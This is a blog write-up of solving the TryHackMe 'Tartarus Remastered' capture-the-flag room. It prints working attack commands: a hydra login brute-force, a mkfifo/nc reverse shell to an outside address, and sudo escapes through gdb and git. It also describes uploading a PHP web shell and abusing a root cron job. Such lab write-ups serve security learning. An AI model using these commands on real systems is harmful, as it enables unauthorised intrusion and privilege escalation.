Tartarus_writeup

Oct. 28, 2020

Post Cover Gif animation

Tartarus-Remastered TryHackMe Room

Welcome back! Today I have another writeup. This time I went for a just-released room on TryHackMe called Tartarus Remastered. I hope you enjoy it!

Getting Started

I’ll be using once again autorecon <IP> to scan this box. So leave that running or perform manual scans if you’d like. I’m going through this room on my lunch break at work so don’t have much time XD.

Checking Autorecon Results and gaining access.

If we look at Gobuster’s results, we see a robots.txt file that we can access:

If we look at that directory in disallowed entry:

If we look at the FTP (nmap scan shows anonymous login is enabled), we can see something interesting:

There are directories named ... that we can access and inside there is a file.

If we check that file we see another directory is mentioned:

We get a login form. This is getting quite familiar, we can try the same we did for the room called Hydra. Check that here.

We need to construct a POST request attack with hydra.

/sUp3r-s3cr3t

hydra -l userid -P credentials.txt 10.10.61.206 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect" -V -F -u

We can also let gobuster now we have a new directory that it can explore:

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.61.206/sUp3r-s3cr3t/ -x php,txt,html,sh,cgi

If we brute-force the login request we get the following:

And if we login we get an upload form:

We can try to upload a semi-interactive php-bash and see if we can access that:

Now if we navigate back to that images/uploads/ folder, we see our file is there:

If we go ahead and click on that file we get our PHP-Bash working:

If we navigate to the home folder, we can access d4rckh folder and cat out the user flag:

Ok so now we need to go get the root flag. Even though the semi-interactive shell we got is fine. I would like to have better access from my own terminal so let’s try to get a reverse shell.

We start a nc -nlvp 2112 in our terminal and then we try to fire a connection in the php-bash file back to our machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.0.34 2112 >/tmp/f

Now that we have a reverse shell, we can navigate a bit more comfortable. If we take a look at the other folder at the home directory we see another file that mentions git.

If we run a sudo -l we see that the user we have can run gdb as sudo. Let’s check GTFObins to see if we have a way of exploiting that.

It seems there is a way to get a reverse shell, lets try that:

Maybe I’m doing something wrong but gdb did not work and I still was www-data user after trying all the options listed on GTFbins. Let’s check if we have any running cron jobs:

Indeed we have and, it is a file I saw inside d4rckh’s folder. Since that cron job is running as root, we can try to edit it so when it runs it spaws a privileged shell back to us.

But first we really need to get gdb working so we can switch user. The idea here is to impersonate the other user thirtytwo and see what he can run as sudo, and if we recall the file we found earlier we know that d4rckh fixed the access to git for him. So we can assume thirtytwo could have privileged access to git executable.

After checking a while on that gdb binary, it seems we can try it as follows:

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex qu

That seems to work and we are now the expected user which, as we thougth has access to git.

Let’s check back on GTFObins if we have anything on git to get root.

We can try to run python -c 'import pty;pty.spawn("/bin/bash");' to get a TTY shell before we try to get root.

NOTE: also run export TERM=xterm to get a more responsive terminal that for instance is able to clear the screen.

Now let’s try some of the commands suggested by GTFObins. If we check the Sudo section we get a few to try. The first one does not work at all in this case. Let’s check the second:

sudo git -p help config and !/bin/sh

Still we need to adjust the command a bit, we need to explicitly set the user we want to switch to:

sudo -u d4rckh git -p help config

That seems to work and we are now the user d4rckh

Ok now let’s check that cleanup.py file that’s running as a cron job. And see if we can edit it to get us root.

NOTE: To make sure I don’t lose the original file, I ran cp cleanup.py cleanup.py.bak

Now let’s see if we can edit the file with nano:

Even though we got an error before nano opens, we are able to edit the file. We make the changes to the command being executed so it creates a copy of bash with privileges that we can execute later in one of our accessible directories:

We save the file and we just wait, since the file is tied to a cronjob we need to wait for it to get executed:

If you notice the command tells the system to copy bash into a tmp/rootbash folder.

NOTE: Credits to @ratiros01 on that command, I was just failing at making that work until I came across his idea for that in one of his posts.

Let’s navigate to that temp folder and see if we get our bash copied. We do, it worked. Now we need to run that file, however we need to make use of the switch -p so the binary would not drop his privileges. Otherwise it would run with the permissions our current user has.

It worked great and we are now root!, let’s grab that flag and complete the room.

I hope you enjoyed this room as much as I did, thanks again to @ratiros01 for his post that helped me when I got stuck.

Happy hacking and thanks for stopping by!



comments powered by Disqus